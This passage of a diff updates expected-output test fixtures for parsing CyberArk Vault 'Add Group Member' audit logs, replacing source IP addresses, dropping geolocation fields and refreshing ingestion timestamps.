09:58:01\",\"IsoTimestamp\":\"2021-03-10T17:58:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMMaster\",\"TargetUser\":\"Administrator\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:42.577481900Z", + "original": "\u003c5\u003e1 2021-03-10T17:58:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:58:01\",\"IsoTimestamp\":\"2021-03-10T17:58:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMMaster\",\"TargetUser\":\"Administrator\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" } @@ -275,20 +227,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -305,7 +245,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -313,7 +253,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T17:59:29Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Group Member", "target_user": "PSMApp_VAGRANT", "source_user": "PSMAppUsers", @@ -329,8 +269,8 @@ "event": { "severity": 2, "action": "add group member", - "ingested": "2021-06-09T10:24:29.730038300Z", - "original": "\u003c5\u003e1 2021-03-10T17:59:29Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:29\",\"IsoTimestamp\":\"2021-03-10T17:59:29Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"PSMApp_VAGRANT\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:42.577487200Z", + "original": "\u003c5\u003e1 2021-03-10T17:59:29Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:29\",\"IsoTimestamp\":\"2021-03-10T17:59:29Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"PSMApp_VAGRANT\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" } @@ -342,20 +282,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -372,7 +300,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -380,7 +308,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T17:59:30Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Group Member", "target_user": "PSMGw_VAGRANT", "source_user": "PVWAGWAccounts", @@ -396,8 +324,8 @@ "event": { "severity": 2, "action": "add group member", - "ingested": "2021-06-09T10:24:29.730041500Z", - "original": "\u003c5\u003e1 2021-03-10T17:59:30Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:30\",\"IsoTimestamp\":\"2021-03-10T17:59:30Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PVWAGWAccounts\",\"TargetUser\":\"PSMGw_VAGRANT\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:42.577492900Z", + "original": "\u003c5\u003e1 2021-03-10T17:59:30Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:30\",\"IsoTimestamp\":\"2021-03-10T17:59:30Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PVWAGWAccounts\",\"TargetUser\":\"PSMGw_VAGRANT\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" } @@ -409,19 +337,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "35.192.121.42", - "ip": "35.192.121.42" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" @@ -438,7 +355,7 @@ }, "related": { "ip": [ - "35.192.121.42" + "67.43.156.14" ] }, "cyberarkpas": { @@ -446,7 +363,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T22:17:15Z", - "station": "35.192.121.42", + "station": "67.43.156.14", "action": "Add Group Member", "target_user": "Administrator", "source_user": "PSMMaster", @@ -462,8 +379,8 @@ "event": { "severity": 2, "action": "add group member", - "ingested": "2021-06-09T10:24:29.730044700Z", - "original": "\u003c5\u003e1 2021-03-10T22:17:15Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:17:15\",\"IsoTimestamp\":\"2021-03-10T22:17:15Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMMaster\",\"TargetUser\":\"Administrator\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"35.192.121.42\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:42.577498200Z", + "original": "\u003c5\u003e1 2021-03-10T22:17:15Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:17:15\",\"IsoTimestamp\":\"2021-03-10T22:17:15Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMMaster\",\"TargetUser\":\"Administrator\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" } @@ -475,19 +392,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "35.192.121.42", - "ip": "35.192.121.42" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" @@ -504,7 +410,7 @@ }, "related": { "ip": [ - "35.192.121.42" + "67.43.156.14" ] }, "cyberarkpas": { @@ -512,7 +418,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T22:19:16Z", - "station": "35.192.121.42", + "station": "67.43.156.14", "action": "Add Group Member", "target_user": "PSMApp_ASR-WIN", "source_user": "PSMAppUsers", @@ -528,8 +434,8 @@ "event": { "severity": 2, "action": "add group member", - "ingested": "2021-06-09T10:24:29.730047700Z", - "original": "\u003c5\u003e1 2021-03-10T22:19:16Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:19:16\",\"IsoTimestamp\":\"2021-03-10T22:19:16Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"PSMApp_ASR-WIN\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"35.192.121.42\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:42.577503500Z", + "original": "\u003c5\u003e1 2021-03-10T22:19:16Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:19:16\",\"IsoTimestamp\":\"2021-03-10T22:19:16Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"PSMApp_ASR-WIN\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" } @@ -541,19 +447,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "35.192.121.42", - "ip": "35.192.121.42" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" @@ -570,7 +465,7 @@ }, "related": { "ip": [ - "35.192.121.42" + "67.43.156.14" ] }, "cyberarkpas": { @@ -578,7 +473,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T22:19:16Z", - "station": "35.192.121.42", + "station": "67.43.156.14", "action": "Add Group Member", "target_user": "PSMGw_ASR-WIN", "source_user": "PVWAGWAccounts", @@ -594,8 +489,8 @@ "event": { "severity": 2, "action": "add group member", - "ingested": "2021-06-09T10:24:29.730050900Z", - "original": "\u003c5\u003e1 2021-03-10T22:19:16Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:19:16\",\"IsoTimestamp\":\"2021-03-10T22:19:16Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PVWAGWAccounts\",\"TargetUser\":\"PSMGw_ASR-WIN\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"35.192.121.42\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:42.577508700Z", + "original": "\u003c5\u003e1 2021-03-10T22:19:16Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:19:16\",\"IsoTimestamp\":\"2021-03-10T22:19:16Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PVWAGWAccounts\",\"TargetUser\":\"PSMGw_ASR-WIN\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" } @@ -607,20 +502,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -637,7 +520,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -645,8 +528,8 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-11T16:59:38Z", - "station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:59:38\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:59:38Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e265\u003c/MessageID\u003e\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\n \u003cSourceUser\u003ePSMAppUsers\u003c/SourceUser\u003e\n \u003cTargetUser\u003ePSMPApp_VAGRANT\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:59:38\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:59:38Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e265\u003c/MessageID\u003e\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\n \u003cSourceUser\u003ePSMAppUsers\u003c/SourceUser\u003e\n \u003cTargetUser\u003ePSMPApp_VAGRANT\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Add Group Member", "target_user": "PSMPApp_VAGRANT", "source_user": "PSMAppUsers", @@ -662,8 +545,8 @@ "event": { "severity": 2, "action": "add group member", - "ingested": "2021-06-09T10:24:29.730054200Z", - "original": "\u003c5\u003e1 2021-03-11T16:59:38Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:38\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:38Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e265\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMAppUsers\u003c/SourceUser\u003e\\n \u003cTargetUser\u003ePSMPApp_VAGRANT\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:38\",\"IsoTimestamp\":\"2021-03-11T16:59:38Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"PSMPApp_VAGRANT\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:42.577514100Z", + "original": "\u003c5\u003e1 2021-03-11T16:59:38Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:38\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:38Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e265\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMAppUsers\u003c/SourceUser\u003e\\n \u003cTargetUser\u003ePSMPApp_VAGRANT\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:38\",\"IsoTimestamp\":\"2021-03-11T16:59:38Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"PSMPApp_VAGRANT\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" } @@ -675,20 +558,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -705,7 +576,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -713,8 +584,8 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-11T16:59:38Z", - "station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:59:38\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:59:38Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e265\u003c/MessageID\u003e\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\n \u003cSourceUser\u003ePVWAGWAccounts\u003c/SourceUser\u003e\n \u003cTargetUser\u003ePSMPGW_VAGRANT\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:59:38\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:59:38Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e265\u003c/MessageID\u003e\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\n \u003cSourceUser\u003ePVWAGWAccounts\u003c/SourceUser\u003e\n \u003cTargetUser\u003ePSMPGW_VAGRANT\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Add Group Member", "target_user": "PSMPGW_VAGRANT", "source_user": "PVWAGWAccounts", @@ -730,8 +601,8 @@ "event": { "severity": 2, "action": "add group member", - "ingested": "2021-06-09T10:24:29.730057300Z", - "original": "\u003c5\u003e1 2021-03-11T16:59:38Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:38\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:38Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n 